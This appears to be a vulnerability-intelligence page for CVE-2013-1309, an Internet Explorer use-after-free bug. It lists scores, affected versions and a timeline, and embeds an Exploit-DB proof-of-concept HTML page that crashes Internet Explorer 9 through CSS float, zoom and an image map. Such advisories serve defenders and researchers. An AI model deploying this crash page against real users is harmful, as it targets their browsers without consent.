VIR Vulnerability Intelligence Relay

CVE-2013-1309

critical
Published 2013-05-15 · Modified 2026-04-29
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
10.0

Description

Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-2551.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-40893 dos windows verified text · 2 KB
Skylined · 2016-12-09

Microsoft Internet Explorer 9 - MSHTML CDisp­Node::Insert­Sibling­Node Use-After-Free (MS13-037) (1)

text exploit Source: Exploit-DB 
<!--
Source: http://blog.skylined.nl/20161207001.html

Synopsis

A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.

Known affected software and attack vectors

Microsoft Internet Explorer 9

An attacker would need to get a target user to open a specially crafted web-page. Java­Script does not appear to be required for an attacker to triggering the vulnerable code path.

Details

This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. The ZDI did do a more thorough analysis and provide some details in their advisory. I have included a number of reports created using a predecessor of Bug­Id below.

Repro.html:
-->

<!doctype html>
<html>
  <head>
    <script>
      window.onload=function(){location.reload();};
    </script>
  </head>
  <body>
    <var>
      <img class="float" ismap="ismap" usemap="map"/>
      <map id="map"><area/></map>
      <dfn class="float"></dfn>
      <a class="float"></a>
      <input class="zoom"/>
      text
    </var>
    <q class="border float zoom" xml:space="preserve">  </q>
  </body>
  <style type="text/css">
  .float {
    float:left;
  }
  .zoom {
    zoom:3000%;
  }
  .border::first-letter {
    border-top:1px;
  }
  </style>
</html>

<!--
Time-line

1 November 2012: This vulnerability was found through fuzzing.
2 November 2012: This vulnerability was submitted to ZDI.
19 November 2012: This vulnerability was acquired by ZDI.
4 February 2013: This vulnerability was disclosed to Microsoft by ZDI.
29 May 2013: Microsoft addresses this vulnerability in MS13-037.
7 December 2016: Details of this vulnerability are released.
-->

Application impact
VendorProductVersionsFixed
windows microsoftinternet_explorer6
windows microsoftinternet_explorer7
windows microsoftinternet_explorer8
windows microsoftinternet_explorer9
windows microsoftinternet_explorer10

References

CWEs

CWE-416

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.